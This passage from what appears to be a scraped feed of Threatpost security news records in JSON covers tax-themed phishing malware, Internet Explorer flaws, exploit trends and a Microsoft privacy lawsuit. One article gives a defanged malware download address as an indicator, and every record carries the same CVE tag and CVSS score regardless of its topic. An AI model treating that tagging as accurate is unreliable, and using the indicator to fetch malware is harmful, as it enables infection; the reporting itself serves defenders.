action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1-1024x742.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains a malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force a Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serous enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Dennis Fisher and Mike Mimoso talk about the [VENOM vulnerability](<https://threatpost.com/venom-flaw-in-virtualization-software-could-lead-to-vm-escapes-data-theft/112772>), the idea of marketing bugs, Microsoft\u2019s new [Edge browser security features](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738>) and the awesome [CSI: Cyber finale](<https://threatpost.com/the-triumphant-finale-of-csi-cyber/112820>).\n\nDownload: [digital_underground_203.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_203.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-15T11:34:18", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on VENOM, Marketing Bugs, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-18T17:26:21", "id": "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "href": "https://threatpost.com/threatpost-news-wrap-may-15-2015/112852/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Microsoft yesterday added four cryptographic cipher suites to its default priority ordering list in Windows, a move that brings Perfect Forward Secrecy to the operating system.\n\n[Update 3042058](<https://technet.microsoft.com/en-us/library/security/3042058>) is available for now only on the Microsoft Download Center, affording users the opportunity to test the ciphers before bringing them into their respective IT environments. The updates are available for Windows 7, 8 and 8.1 32- and 64-bit systems, as well as Windows Server 2008 R2 and Windows Server 2012 and 2012 R2 system.\n\n\u201cThe update adds the following cryptographic cipher suites to the default list in all affected operating systems and includes improvements to the cipher suite priority ordering,\u201d Microsoft said. The suites are:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nBringing Perfect Forward Secrecy to Windows is an important step forward, especially in context of the expressed desire of many [large technology providers to encrypt everything](<https://threatpost.com/twitter-hardens-services-with-perfect-forward-secrecy/103026>) in the wake of Snowden and NSA/GCHQ surveillance. PFS ensures that new private keys are negotiated for every session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\n\u201cPFS is definitely important when considering attackers with virtually unlimited resources to eavesdrop and crack encryption keys,\u201d said Craig Young, a researcher at Tripwire.\n\nWhile experts are generally applauding Microsoft\u2019s foray into PFS, Microsoft is late to the party. Google, for example, has had the capability in its products for close to three years. Others, including Dropbox, Facebook, Twitter, and Tumbler, all support PFS and have done so for at least a year. Microsoft, however, last year did bring [PFS to its web-based email service Outlook.com](<https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>).\n\nPFS, while a step forward, is not perfect. There is a performance hit, which Microsoft acknowledges in its advisory, because of its higher computing requirements. It urges Windows server administrators to test for jumps in resource consumption as connections encrypted with TLS/SSL scale up on the client and server side. Kenneth White, director of the Open Crypto Audit Project (OCAP) said Microsoft\u2019s use of crypto suites such as DHE rather than ECDHE, for example, could exacerbate the performance issue.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling,\u201d White said. \u201cFirst, the Forward Secrecy suites (DHE) are ephemeral but they don\u2019t use elliptic curves, and are actually one of the least efficient PFS suites. It\u2019s also good to see the rollout of authenticated modes (AEAD, here GCM). So, this is certainly forward progress, but it would be nice to see efficient authenticated ephemeral Diffie-Hellman ECC suites on the near-term road map.\u201d\n\nWhite said the use of DHE rather than ECDHE, in some cases, causes between twofold and eightfold decrease in performance.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling.\u201d \nKenneth White\n\n\u201cIf the server has to work harder, the maximum number of simultaneous connections is significantly reduced,\u201d White said. \u201cSimilarly, clients such as web browsers or API peers will have higher load using DHE.\u201d\n\nExperts have been harping on the fact that Perfect Forward Secrecy should be considered minimum crypto standard, especially with new applications. The same goes for HSTS, or [HTTP Strict Transport Security](<https://www.owasp.org/index.php/HTTP_Strict_Transport_Security>), which is a security policy header that tells browsers to communicate only over HTTPS.\n\n\u201cManaging your crypto by removing old ciphers and in this case adding new ones is a good housekeeping move for Microsoft,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cKnowing your cipher suites is like knowing what you\u2019re eating: it\u2019s a fundamental building block of trust, and it pays to read the label.\u201d\n", "cvss3": {}, "published": "2015-05-13T12:14:00", "type": "threatpost", "title": "Microsoft Brings Perfect Forward Secrecy to Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-15T18:33:16", "id": "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "href": "https://threatpost.com/new-crypto-suites-bring-perfect-forward-secrecy-to-windows/112783/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055227/ms_office_bug.jpg)](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in \nOffice 2010 by tapping into the unused computing horsepower of idling \nPCs. Office developers \nfound the bugs by running millions of \u201cfuzzing\u201d tests, said Tom \nGallagher, senior security test lead with Microsoft\u2019s Trustworthy \nComputing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055037/ie_holes_2.jpg)](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n![Get Microsoft Silverlight](http://go.microsoft.com/fwlink/?LinkId=108181) \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054549/windows_bitlocker.jpg)](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054455/ie_bug.jpg)\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054403/owasp_sdl.jpg)](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the 